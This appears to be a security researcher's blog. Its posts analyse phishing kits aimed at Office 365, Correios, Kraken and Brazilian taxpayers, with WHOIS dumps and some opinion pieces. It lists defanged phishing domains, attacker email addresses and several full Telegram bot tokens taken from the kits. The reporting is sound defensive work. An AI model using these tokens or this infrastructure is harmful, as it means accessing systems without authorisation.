Today I found an email with an SVG attachment in my secondary email account. The account is Office 365 and the email was not in spam, this is not good, especially considering how much 365 costs! Anyway, back to the email, it was clearly suspicious also considering the attachment, an svg file with the name “Your-to-do-List.svg” supposedly sent to me by itself.
I immediately downloaded the file and opened it with Notepad++ (all this without the antivirus having anything to say about it…), inside there was a script that through a simple algorithm made a redirect to a phishing site with the aim of stealing the credentials of the same Office 365 account.
The target URL is: hxxps://bzzrr[.]yiunwox[.]es/!7ijf9v9ehpNFEKt/$
When I tried to forward the message to my Gmail account, Google’s mail server correctly returns an error 🙂
As always, avoid downloading and opening attachments if you are not sure of the source.
In the last few weeks I have noticed that attacks on Correios are constant. I have studied the matter a bit: it is the Brazilian state company that manages shipments and payments related to them.
The scam is always the same, attackers write to users saying that a shipment is blocked and that a small payment is needed to unblock it. What is interesting about this attack is that the user by entering the CPF (Cadastro de Pessoas FÃsicas) gets his data displayed on the page and this certainly appears to the user as something reliable.
The domain used for the attack is cpf-pendente[.]co[.]ua and it was registered few hours ago.
The first curiosity is that the archive is a RAR instead of a ZIP. Someone hoped to make life difficult for Matrix but I love writing code and this allows Matrix to open different types of archives, including obviously RAR 🙂
Aside from the type of archive, my curiosity about this kit was given by the functionality of extracting user data starting from the CPF. I do not know the Brazilian law but that from a simple number you can extract personal data seems unsafe to me.
The kit uses an external service to resolve the client data. This service I assume is part of the attack and probably uses another service in turn, perhaps legitimate or a leak from who knows where. This service is available at the domain anonimobusca[.]online. It was registered one week ago.
Domain Name: ANONIMOBUSCA.ONLINE Registry Domain ID: D544101018-CNIC Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://namecheap.com Updated Date: 2025-04-15T13:27:33.0Z Creation Date: 2025-04-15T13:27:28.0Z Registry Expiry Date: 2026-04-15T23:59:59.0Z Registrar: Namecheap Registrar IANA ID: 1068 Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant State/Province: Capital Region Registrant Country: IS Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: DAPHNE.NS.CLOUDFLARE.COM Name Server: IGNAT.NS.CLOUDFLARE.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2025-04-23T07:20:24.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnicregistry.com/support/information/rdap <<<
The registration data available in this service is limited. Additional data may be available at https://lookup.icann.org
The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnicregistry.com)
Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnicregistry.com/pub/whois_guidance.
To obtain the user information, the phishing kit, uses a specific resource exposed by the second domain
Another aspect is related to how payments are collected. The kit does not in fact collect itself he payment data. The user makes the payment using systems that manage transactions. The services used to perform the transactions are:
Both services have been active for a short time, they use cheap providers for domain management and have free certificates. In short, I would say that nothing seems to give trust to these services.
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: paguesafe.com Registry Domain ID: 2805917900_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.rrpproxy.net Registrar URL: https://www.hostinger.com/contacts Updated Date: 2025-01-22T02:22:32Z Creation Date: 2023-08-14T19:17:29Z Registrar Registration Expiration Date: 2025-08-14T19:17:29Z Registrar: Key-Systems GmbH Registrar IANA ID: 269 Registrar Abuse Contact Email: abusereport@key-systems.net Registrar Abuse Contact Phone: +49.68949396850 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Not Available From Registry Registrant Name: On behalf of paguesafe.com OWNER Registrant Organization: c/o whoisproxy.com Registrant Street: 604 Cameron Street Registrant City: Alexandria Registrant State/Province: VA Registrant Postal Code: 22314 Registrant Country: US Registrant Phone: +64.48319528 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 20f3221829e93b3a03d0a4bba3bcdb0491e3ed52d42dd6bff0f8d15a0f6fc777@paguesafe.com.whoisproxy.org Registry Admin ID: Not Available From Registry Admin Name: On behalf of paguesafe.com ADMIN Admin Organization: c/o whoisproxy.com Admin Street: 604 Cameron Street Admin City: Alexandria Admin State/Province: VA Admin Postal Code: 22314 Admin Country: US Admin Phone: +64.48319528 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 20f3221829e93b3a03d0a4bba3bcdb0491e3ed52d42dd6bff0f8d15a0f6fc777@paguesafe.com.whoisproxy.org Registry Tech ID: Not Available From Registry Tech Name: On behalf of paguesafe.com TECH Tech Organization: c/o whoisproxy.com Tech Street: 604 Cameron Street Tech City: Alexandria Tech State/Province: VA Tech Postal Code: 22314 Tech Country: US Tech Phone: +64.48319528 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 20f3221829e93b3a03d0a4bba3bcdb0491e3ed52d42dd6bff0f8d15a0f6fc777@paguesafe.com.whoisproxy.org Registry Billing ID: Not Available From Registry Billing Name: On behalf of paguesafe.com BILLING Billing Organization: c/o whoisproxy.com Billing Street: 604 Cameron Street Billing City: Alexandria Billing State/Province: VA Billing Postal Code: 22314 Billing Country: US Billing Phone: +64.48319528 Billing Phone Ext: Billing Fax: Billing Fax Ext: Billing Email: 20f3221829e93b3a03d0a4bba3bcdb0491e3ed52d42dd6bff0f8d15a0f6fc777@paguesafe.com.whoisproxy.org Name Server: ns1.dns-parking.com Name Server: ns2.dns-parking.com DNSSEC: unsigned Whoisprivacy: 1 URL of the ICANN WHOIS Data Problem Reporting System: https://wdprs.internic.net/ >>> Last update of WHOIS database: 2025-04-23T07:20:56Z <<<
For more information on Whois status codes, please visit https://www.icann.org/epp
To contact the registered registrant please proceed to: https://www.domain-contact.org
Please register your domains at; https://www.hostinger.com/contacts This data is provided by for information purposes, and to assist persons obtaining information about or related to domain name registration records. does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances, you will use this data to 1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via E-mail (spam) or 2) enable high volume, automated, electronic processes that apply to this WHOIS server. These terms may be changed without prior notice. By submitting this query, you agree to abide by this policy.
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: atlaspagamentos.com Registry Domain ID: 2936397696_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2024-11-22T15:48:06Z Creation Date: 2024-11-22T15:48:06Z Registrar Registration Expiration Date: 2025-11-22T15:48:06Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: Not Available From Registry Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 100 S. Mill Ave, Suite 1600 Registrant City: Tempe Registrant State/Province: Arizona Registrant Postal Code: 85281 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: https://www.godaddy.com/whois/results.aspx?domain=atlaspagamentos.com&action=contactDomainOwner Registry Tech ID: Not Available From Registry Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 100 S. Mill Ave, Suite 1600 Tech City: Tempe Tech State/Province: Arizona Tech Postal Code: 85281 Tech Country: US Tech Phone: +1.4806242599 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: https://www.godaddy.com/whois/results.aspx?domain=atlaspagamentos.com&action=contactDomainOwner Name Server: ARYA.NS.CLOUDFLARE.COM Name Server: BRETT.NS.CLOUDFLARE.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2025-04-23T07:22:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice.
**NOTICE** This WHOIS server is being retired. Please use our RDAP service instead.
To this I would like to add that the two graphical interfaces are practically the same.
Nothing annoys me more than hearing the term “hacker” used as a synonym for “criminal”. I can actually accept it from people who do something else in life. It really bothers me when this abuse comes from people who say they are cyber security professionals.
I understand that in recent years everyone has become cyber security experts. Those who were previously blockchain experts, before big data experts and even before one of the many trends that have plagued IT. In many cases, the place of many of these would have been a nice industrial fryer for chips in a fast food restaurant.
“I know that I know nothing”, having quoted Socrates, I can admit that I am not the right person to explain what a hacker is, so I report the Manifesto.
If you don’t work in IT and you don’t know it, it’s not serious. If you work in IT and you don’t know it, it’s serious. If you work in cyber security and you don’t know it, for me mayonnaise and ketchup 😉
Being a hacker means facing life with passion and living the passion without limits. This does not mean harming others. For this reason a hacker is not a criminal. He can be if he harms others, but in doing so he becomes a criminal and must be considered as such.
Another thing: let’s be serious, “ethical hacker” is funny, it smacks of an elderly “script kiddie”!
After many years as a Facebook user yesterday I deactivated my Facebook account. I also deleted my Instagram, but in fact I never used it. The people at Twitter had blocked my Twitter account, so now if you want to talk to me you have to send me an email or call me on the phone 🙂
I know it’s not a big deal, but several friends have been asking me why in the last few hours, so I decided to share this why here, where I can write freely.
I’ve always had a fairly active social life on Facebook, I liked sharing what I was doing and participating in what my friends were sharing. But my passion for social media passed when I realized that social media has become mainly a tool for revenge. Whoever has to say something stupid says it on social media. The real environment in which we live protects and regulates us, no one can say too much bullshit without being reprimanded. Social media, on the other hand, has become the megaphone of morons in too many cases.
Last month I tried deleting the app from my smartphone. It worked well, the usage time was reduced and it didn’t cost me any effort. Finally I could spend more time on the toilet with Nova Lectio. The notification mechanism is evil, it needs to be managed, especially for young people who grew up with it and are convinced that it’s normal to always be available to others and, even worse, to a program that tries to sell you stuff or, even worse, to sell you to others.
After what happened in Romania, where a civilized state defended itself from a rigged outcome via social media. After seeing how the American government views Europe (and I am happy to be European). After seeing the support that social media gives to characters that I consider embarrassing for the human species. After all this, I thought it was better to take a step back.
I will continue to use LinkedIn because so far “mom Microsoft” is doing a great job and it seems to me that it continues to be a place where one can be at peace.
I’ve never kissed anyone’s ass, and I certainly won’t do it through someone else.
Looking at what ends up in the Matrix network I noticed a kit that targets Kraken customers.
As usual, the victim is frightened with an alleged compromise of their account.
The interesting aspect of this kit is that instead of asking the victim to enter their wallet details, the application suggests the victim to schedule a phone meeting. The user is asked to leave their phone number and is even provided with an .ics file with the appointment details, so that the victim remembers not to make other commitments 😀
The user data is sent to a Telegram bot as usual.
Looking for updates received from bots we find several messages waiting to be read by the fraudster. Since the domain where we found the kit does not yet have the kit online, it means that there are other sites with the kit already in operation.
Searching Elastic for domains with “kraken” in their names that are managed by the same DNS server (dnspod.com) brought up several other domains including kraken-centre.com which of course has the kit already online.
Free time is less and less, nevertheless I try to dedicate at least a couple of hours every week to the analysis of the Matrix evidence. I dedicate some time to the analysis of phishing kits and to the sharing of the email and Telegram token indicators on my public ioc repo: https://github.com/ecarlesi/ioc.git
From this analysis a spontaneous question arises: why do the same accounts continue to be active over time? Does no one notice that they are being used for illicit purposes?
The obvious answer might be that Telegram is based in Dubai, founded by a Russian, maybe preventing or mitigating fraud is not at the forefront of their minds. Maybe. Let’s say the same goes for Yandex, they are Russian. Maybe. What I don’t understand though is why they don’t block Gmail and Yahoo accounts either, just to name two non-Russian companies.
Let’s take the segdairo as gmail dot com account for example. I personally found it in 5 different attacks, the first one dating back to May 13, 2024.
Later I found it in other kits within which I identified other indicators:
hxxps://digitalbankingsonoraweb[.]online/verify/SONORA%20CU.zip contains the Telegram token 5453712056:AAE5M0Nnbcm0eanesMhIV62mNU_WgM20A6c
hxxps://dlgitaldove88system[.]online/FIRST%20FIFELITY%20BANK.zip contains the Telegram token 7223951606:AAHTkeSZ1UFauExPuwkzK_wfORFsldNFbnA
hxxps://digitalconnectfirstnow[.]online/FIRST%20UNITED%20BANK.zip contains the email account hakekelly07 at gmail dot com and the Telegram token 7103172103:AAFibon0scauwaJ6gnsY3vBfQ7e13IST9QY
hxxps://online-ctricbonline[.]cfd/cancel/login%20(1).zip contains the Telegram token 6318747656:AAFlcQchhlCb9DNkfpXvCEKXhSr0yINXgQc
hxxps://dashboardverfedconnect[.]online/VERMONT%20FCU.zip contains the Telegram token 7482950914:AAEupDhXYLKY_vvZHvwiCdgG_A2y4W5Jgn8
Not understanding why email accounts are blocked even when they are clearly involved in illicit activities, I tried to understand how to report a criminal email account. Searching on the internet I found some instructions from Google that talk about how to report an email received. However, I did not find how to report an email involved in illicit activities without having received any email from it in my Gmail account. I also found directions regarding Google Workspace accounts, which are very convenient, but this is not the case.
I finally found a link to the Internet Crime Complaint Center (ic3[.]gov). There is a form to report the event. It is now dinner time, given the length of the form, maybe I will do it after dinner.
Here I found something interesting: the Government explains how to recognize a legitimate Government domain, there is “.gov” and the padlock that indicates the use of https…
I would say not very well since every day there are thousands of new domains that meet these requirements 😀
At the end of a pretty busy day, I finally found a few minutes to check out the incoming notifications from Matrix. I noticed a kit that targets Kraken customers because their icon reminds me of the ghost from Pacman, and just today I got the vintage Pacman console 🙂
The domain used for the attack is krakeeen[.]top. It was registered three days ago and Matrix keep the monitoring active waiting for the kit. It arrives some hours ago. Thanks attacker 🙂
At the moment the only reports on this matter are those made by Matrix.
As usual, the kit is PHP based.
Every now and then someone tells me that my posts seem like I don’t love it! That’s not true, I really like PHP and often the code is badly written and therefore sucks.
I love PHP and its community!!!!!
As for the stolen credentials, the kit requires that they be sent to the email address hardeyholar47@gmail[.]com.
Of course I added it to the list that I hope you already know 🙂
This morning I came across a kit aimed at Brazilian taxpayers. The domain used for the attack is consultarencomeda[.]online
The attack is currently in its initial phase, the domain was registered a few hours ago and the kit was copied to the hosting. Matrix intercepted these two activities, analyzed the archive containing the kit and sent the notification to Urlscan. To date, no one reports this site as malicious.
The default page of the kit mimics a Hostinger landing page in an attempt to block crawlers.
Opening the kit we discover how it works. At the base there is always the attempt to put pressure on the user, here the payment of a fee is demanded.
Without wasting time on how the kit works, as always it is poorly written PHP code, I highlight the channels that are used for payment and sending notifications to the customer.
The transaction takes place through a service provided by the domain codetech-payment-fanpass[.]rancher[.]codefabrik[.]dev
This service has no internet presence, is not advertised nor have I been able to figure out who it is associated with.
Sending notifications is implemented by pushcut[.]io, of course this is a legitimate service and the presence of a key in the kit, I hope it can help the company to identify the abuse.
I have always been opposed to private citizens owning weapons. It seems to me to be a surrender by society, which, unable to guarantee security, subcontracts it to individuals. In Europe, the use of force is the exclusive prerogative of the state. I consider this a great achievement of civilization. Not least because it is based on the principle that personal freedom begins where that of others ends. My freedom cannot be total because it would end up limiting that of others.
Let me explain it for dummies: I can’t play with uranium in my house because the radiation would be harmful to my neighbors. Do I have the right to keep radioactive material at home? No. Does this limit my freedom? Yes. Is this a problem? No, damn it!
At this point, a Trump supporter might argue that if someone is a criminal, they could also use a knife to kill, or a car, or a lot of other things. This reasoning is specious because firearms are designed for the sole purpose of killing, unlike knives and cars.
Emiliano Carlesi's blog 
You must be logged in to post a comment.